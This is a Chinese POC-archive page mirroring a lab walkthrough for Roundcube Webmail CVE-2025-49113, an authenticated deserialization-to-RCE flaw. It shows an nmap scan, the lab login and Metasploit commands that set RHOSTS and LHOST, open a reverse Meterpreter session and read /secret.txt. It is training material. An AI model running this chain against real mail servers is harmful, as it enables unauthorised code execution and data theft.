支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:752

75.2%
立即捐款

POC详情: 445a763d0edce3fb0a8f8546395da1b87ddf545a

来源
https://github.com/ankitpandey383/roundcube-cve-2025-49113-lab
关联漏洞
标题:Roundcube Webmail 安全漏洞 (CVE-2025-49113)
描述:Roundcube Webmail是Roundcube开源的一款基于浏览器的开源IMAP客户端,它支持地址薄管理、信息搜索、拼写检查等。 Roundcube Webmail 1.5.10之前版本和 1.6.11之前版本存在安全漏洞,该漏洞源于未验证_from参数,可能导致PHP对象反序列化攻击。
描述
Hands-on exploitation lab for Roundcube Webmail CVE-2025-49113 (authenticated PHP object deserialization → RCE) to read /secret.txt.
介绍
"DISCLAIMER: Educational Use Only"

# Roundcube Webmail RCE – CVE-2025-49113 Lab
This repository documents my step-by-step exploitation of **Roundcube Webmail CVE-2025-49113** in a controlled lab to obtain the secret stored in `/secret.txt`.
> ⚠️ **Disclaimer**  
> All work was performed against a lab / training environment that I am authorised to test.  
> Do **not** use these techniques against systems you do not own or administrate.
---
## Challenge
Roundcube Webmail is a browser-based, open-source PHP email client that connects to mailboxes via IMAP and sends mail via SMTP. It commonly runs on Apache or Nginx with MySQL/PostgreSQL/SQLite and is widely used in shared hosting environments.

**Vulnerability – CVE-2025-49113**

All Roundcube versions up to and including `1.6.10` (and `1.5.x` before `1.5.10`) contain a critical bug in `program/actions/settings/upload.php`. The `_from` parameter is not properly validated, which allows an authenticated attacker to trigger **unsafe PHP object deserialization** and achieve **remote code execution** with web server privileges.

**Lab credentials:**

- Username: `roundcube`  
- Password: `rcpass`  

**Goal:**  
> *What is the secret inside the `/secret.txt` file?*

---

## Lab Environment

- Attacker host: Kali / HackerBox with:
  - `nmap`
  - `msfconsole` (Metasploit 6)
- Target host: Roundcube Webmail on `172.20.2.57`
- Exploit used: `exploit/multi/http/roundcube_auth_rce_cve_2025_49113`
---
## Walkthrough

### Step 1 – Service discovery with Nmap
Command:
nmap -sV Target Machine
### Step 2 - Locating a PHP object deserialization exploit in Metasploit
# search php object deserialization
### Step 3 - Configuring the Roundcube exploit module
msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113
msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine
msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine
msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine 
msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine
### Step 4 - Getting a Meterpreter session and reading /secret.txt
meterpreter > cat /secret.txt
文件快照

 [4.0K]  /data/pocs/445a763d0edce3fb0a8f8546395da1b87ddf545a
├── [ 619]  Defensive Recommendations
├── [1.0K]  License
├── [2.2K]  README.md
├── [106K]  Step-1.jpg
├── [138K]  Step-2.jpg
├── [ 66K]  Step-3.jpg
└── [100K]  Step-4.jpg

1 directory, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。